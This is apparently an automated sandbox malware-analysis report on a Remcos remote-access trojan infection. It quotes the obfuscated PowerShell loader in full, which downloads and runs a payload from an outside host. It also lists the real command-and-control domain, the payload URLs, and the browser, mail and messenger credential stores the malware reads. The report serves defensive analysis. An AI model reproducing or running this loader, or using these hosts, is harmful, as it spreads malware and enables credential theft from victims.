$anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr stumpnser midernes fugtighedscremerne tilkaldte lancinated territorializations feest digammate fattigfint dossiers konvojeredes rudyard filmologerne tandpiner griqua augustly pantningens univalve scalping spectromicroscopical autoklaveringerne hjlpeprsters brotherlike inflationr';if (${host}.currentculture) {$anthranyl++;}function brandmyndighederne($emblemers){$eventyrroman=$emblemers.length-$anthranyl;$hawsing='substri';$hawsing+='ng';for( $daghesh=1;$daghesh -lt $eventyrroman;$daghesh+=2){$stumpnser+=$emblemers.$hawsing.invoke( $daghesh, $anthranyl);}$stumpnser;}function opdateringsprogrammet($etruscan){ & ($androlepsia) ($etruscan);}$garvin=brandmyndighederne 'am.o zci,l,lfai/h5 .r0b ,( w i.n,dsolw sm ,n t. 1.0a.a0 ;f aw i nu6.4,;. nx 6 4b;s trtv : 1 2s1 . 0 )v sgpe cvkiot/b2 0i1s0r0 1,0i1t sf ior esfto,xh/c1u2 1 .b0 ';$maltreated=brandmyndighederne '.urs e rc-ka g.e,n ti ';$lancinated=brandmyndighederne 'oh t,t pps :b/h/,c o.nmtae mserg as..ctowm .jduo./sn e dvstlja gpn isnsgas.. dswops>kh t tsp s :p/,/pm o,vbide srmoa crk t a,lhkb.rc o ms/,n.eodhsuloasgcnfi.nbg s,.,dswgp ';$shrugging=brandmyndighederne 's> ';$androlepsia=brandmyndighederne '.iye.xr ';$trendies='digammate';$debarrance = brandmyndighederne 'aebc.hsog %ba p pfdpawtoa %o\ap.r ogs kgr i.b.exr ensk.,buectt &c&, e c hsot kt ';opdateringsprogrammet (brandmyndighederne ' $,g l,o.b.ahl,: s.a.l g,s.e neh,efdme,rhsd=p( c mrds k/ cc ,$md e,b,avr raa,n caes) ');opdateringsprogrammet (brandmyndighederne ',$rgiluo b acl,:itri l kpaul.dtt,es=.$plaabn c,isn.artle dt.iskp lri t.(,$,sfh,rgungtgvi nmgs)f ');opdateringsprogrammet (brandmyndighederne ' [bnfeate. s ecr v,itc.e.p,o isnptvmfadn,abgfe rj]h: : s ebcgu,rti tsyupnr optuopcvosl a= t[cn eftl. sme,c.usr,iet,ysp r,ostso csoilstey pse ],:v: t ltsu1e2. ');$lancinated=$tilkaldte[0];$acupressure= (brandmyndighederne 's$ag,l o.bgapls:sskoam mhedr,f,uogdl e,n egtftcect,s = nme.ws- otbsj,egc ts .sbyrs tcetms.inseat .,wiedbkcclii edn t');$acupressure+=$salgsenheders[1];opdateringsprogrammet ($acupressure);opdateringsprogrammet (brandmyndighederne 'd$ssso mfmse r feu grlseknse t taehths .,h e a,dcebr s [b$mmfahl.t.r,e a t e d,]h=d$ gea ravrirnt ');$nourishments=brandmyndighederne 'p$kscogmlmoeer ffu,g lue.nse t t eotoss.fd.o w nfl osa d f.iulte ( $ l a,nkc i nea tfesd., $ hrj.l p.e pmr sjtfear.s ), ';$hjlpeprsters=$salgsenheders[0];opdateringsprogrammet (brandmyndighederne '.$kg,loo b.a ls:bavshp e.r.ssiao,nts 2 3,=.(stceus tk-bpnart.h s$ih jmlap,e p r,s,t e,rms )k ');while (!$aspersions23) {opdateringsprogrammet (brandmyndighe	Jump to behavior

Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerE
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/01 10:19:54 Program Manager]
Source: wab.exe, 0000000A.00000003.1988708190.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.1987753034.00000000005D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager)
Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerlesj
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 54 Program Manager]
Source: wab.exe, 0000000A.00000003.2025037592.00000000005D2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerlesR
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp, kpburtts.dat.10.dr	Binary or memory string: [2024/07/01 10:20:03 Program Manager]

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B22933 cpuid

10_2_22B22933

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B22264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

10_2_22B22264

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 21_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,

21_2_004082CD

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_0041739B GetVersionExW,

19_2_0041739B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: ESMTPPassword	21_2_004033F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	21_2_00402DB3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	21_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wab.exe PID: 1792, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
192.185.112.252	contemega.com.do	United States	46606	UNIFIEDLAYER-AS-1US	false
206.123.148.194	janbours92harbu02.duckdns.org	United States	9009	M247GB	true

Contacted Domains

Name	IP	Active
janbours92harbu02.duckdns.org	206.123.148.194	true
geoplugin.net	178.237.33.50	true
contemega.com.do	192.185.112.252	true
171.39.242.20.in-addr.arpa	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://contemega.com.do/Nedslagnings.dwp	false		unknown
https://contemega.com.do/zPwwF47.bin	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	false	URL Reputation: safe	unknown

AV Detection

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_22B210F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,	10_2_22B26580
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,	19_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	21_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	22_2_00407898

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: janbours92harbu02.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.9:60919 -> 206.123.148.194:3981

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 206.123.148.194 206.123.148.194

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp2.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp3.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp4.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp5.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvB999.tmp.19.dr	String found in binary or memory: realtime.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: contemega.com.do
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
